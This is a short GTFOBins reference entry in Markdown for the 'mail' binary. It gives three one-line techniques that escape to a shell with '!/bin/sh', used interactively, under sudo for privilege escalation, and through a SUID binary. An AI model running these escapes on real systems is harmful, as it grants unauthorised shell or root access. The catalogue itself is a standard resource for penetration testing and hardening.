GTFOBins.github.io/_gtfobins/mail.md
2018-06-01 00:22:34 +02:00

16 lines
255 B
Markdown

---
functions:
execute-interactive:
- code: |
mail -f /etc/hosts
!/bin/sh
sudo-enabled:
- code: |
sudo mail -f /etc/hosts
!/bin/sh
suid-limited:
- code: |
./mail -f /etc/hosts
!/bin/sh
---